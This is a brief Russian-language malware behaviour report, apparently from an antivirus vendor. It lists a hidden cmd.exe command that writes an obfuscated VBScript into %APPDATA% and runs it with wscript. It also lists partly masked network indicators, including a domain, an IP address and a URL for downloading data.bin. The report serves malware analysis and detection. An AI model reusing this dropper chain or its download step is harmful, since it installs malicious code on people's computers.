Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "OQf5IOM=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm MlUAq1" "FUnctIOn S3IG(Gesofo,L6m)" "Og6nac=75" "dIm WZD,JLk,LSNc" "BWoiP=3" "fOr WZD=1 tO (LeN(Gesofo)/2)" "JLk=(J27B((-5337+5375...
- %APPDATA%\17235.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\17235.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "OQf5IOM=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm MlUAq1" "FUnctIOn S3IG(Gesofo,L6m)" "Og6nac=75" "dIm WZD,JLk,LSNc" "BWoiP=3" "fOr WZD=1 tO (LeN(Gesofo)/2)" "JLk=(J27B((-5337+5375...' (со скрытым окном)